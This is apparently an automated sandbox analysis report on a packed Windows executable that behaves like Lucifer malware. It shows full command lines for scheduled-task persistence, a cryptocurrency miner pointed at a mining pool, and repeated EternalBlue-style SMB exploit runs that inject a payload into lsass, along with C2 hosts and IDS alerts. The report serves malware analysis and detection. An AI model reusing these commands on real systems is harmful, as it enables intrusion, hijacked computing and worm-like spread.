Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 14, 2024, 6:35 p.m.	June 14, 2024, 6:44 p.m.

Size	9.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`2d927fdb462570728a981443bf36d19f`
SHA256	`d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239`
CRC32	`AC88795C`
ssdeep	`196608:rhHMBGC3PtXtT+Was8/wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G02wuwasMdJOnZKVSaaNZOn`
Yara	Malicious_Packer_Zero - Malicious Packer Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

help.scr "C:\Users\test22\AppData\Local\Temp\help.scr"
1532
- cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
  2536
  - schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F
    2680
- cmd.exe cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2624
  - taskkill.exe taskkill /f /im spreadTpqrst.exe
    2728
- cmd.exe cmd /c ipconfig /flushdns
  2860
  - ipconfig.exe ipconfig /flushdns
    2988
- spreadTpqrst.exe C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2928
- SMB.exe C:\ProgramData\SMB.exe
  2364
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3428
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3576
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3464
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2SP3_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3668
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3512
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP1_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3768
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3616
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target XP_SP2_X64 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3884
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3724
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3984
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3832
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    4052
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3952
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3604
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  1956
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    3572
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3588
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    4248
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  3808
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    4524
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  4088
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    4712
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  4208
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    4872
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  4436
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    5004
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  4584
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    5180
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  4908
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN7_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    5280
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  5096
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    5964
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  5148
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target SERVER_2008R2_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    6164
- cmd.exe cmd /c cd C:\ProgramData\&&svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  5876
  - svchostromance.exe svchostromance.exe --OutConfig 192.168.56.101.txt --TargetIp 192.168.56.101 --TargetPort 445 --Protocol SMB --Target WIN8_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
    6324
- cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  6232
  - svchostlong.exe svchostlong.exe --TargetIp 192.168.56.101 --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt
    6528
- cmd.exe cmd /c cd C:\ProgramData\&&svchostlong.exe --TargetIp 192.168.56.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig 192.168.56.101-dll.txt --TargetIp 192.168.56.101 --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  4648
  - svchostlong.exe svchostlong.exe --TargetIp 192.168.56.101 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 192.168.56.101.txt
    6572

Name	Response	Post-Analysis Lookup
auto.c3pool.org	A 18.163.115.97 A 47.76.164.119	47.76.164.119
sadan.8b8n.com	A 166.88.61.212	166.88.61.212

IP Address	Status	Action
164.124.101.2	Active	Moloch
166.88.61.212	Active	Moloch
47.76.164.119	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49172 -> 47.76.164.119:19999	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49170 -> 166.88.61.212:4399	2030445	ET MALWARE Lucifer CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.103:50518 -> 192.168.56.101:445	2024217	ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray	A Network Trojan was detected
TCP 192.168.56.101:445 -> 192.168.56.103:50518	2024218	ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response	A Network Trojan was detected
TCP 192.168.56.101:445 -> 192.168.56.103:50518	2024218	ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response	A Network Trojan was detected
TCP 192.168.56.103:50518 -> 192.168.56.101:445	2024297	ET EXPLOIT ETERNALBLUE Exploit M2 MS17-010	Attempted Administrator Privilege Gain
TCP 192.168.56.103:49172 -> 47.76.164.119:19999	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49170 -> 166.88.61.212:4399	2030445	ET MALWARE Lucifer CnC Checkin	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameA June 14, 2024, 6:35 p.m.	computer_name:		0
GetComputerNameW June 14, 2024, 6:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 14, 2024, 6:36 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (50 out of 274 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 14, 2024, 6:36 p.m.	buffer: SUCCESS: The scheduled task "QQMusic" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW June 14, 2024, 6:36 p.m.	buffer: ERROR: The process "spreadTpqrst.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleW June 14, 2024, 6:36 p.m.	buffer: Windows IP Configuration console_handle: 0x00000007	1	1
WriteConsoleW June 14, 2024, 6:36 p.m.	buffer: Successfully flushed the DNS Resolver Cache. console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Running Exploit console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Parameters console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Target 192.168.56.101:445 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Authcode: 0xa2ac3f16 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] XorMask: 0xb2 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Network Timeout: 60 seconds console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Attempting exploit method 1 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Network console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Initial smb session setup completed console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Trying pipe browser... console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Pipe not accessible (Returned code: C0000022) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (StartSmbPipeConnections) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (RunPlugin) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (processParams) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Running Exploit console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Parameters console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Target 192.168.56.101:445 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Authcode: 0xe932d518 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] XorMask: 0x40 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Network Timeout: 60 seconds console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Attempting exploit method 1 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Network console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Initial smb session setup completed console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Trying pipe browser... console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Pipe not accessible (Returned code: C0000022) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (StartSmbPipeConnections) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (RunPlugin) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (processParams) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Running Exploit console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Parameters console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Target 192.168.56.101:445 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Authcode: 0x2a799618 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] XorMask: 0x37 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Network Timeout: 60 seconds console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Attempting exploit method 1 console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Initializing Network console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [+] Initial smb session setup completed console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [*] Trying pipe browser... console_handle: 0x00000007	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Pipe not accessible (Returned code: C0000022) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (StartSmbPipeConnections) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (RunPlugin) console_handle: 0x0000000b	1	1
WriteConsoleA June 14, 2024, 6:37 p.m.	buffer: [-] Error 44 (processParams) console_handle: 0x0000000b	1	1
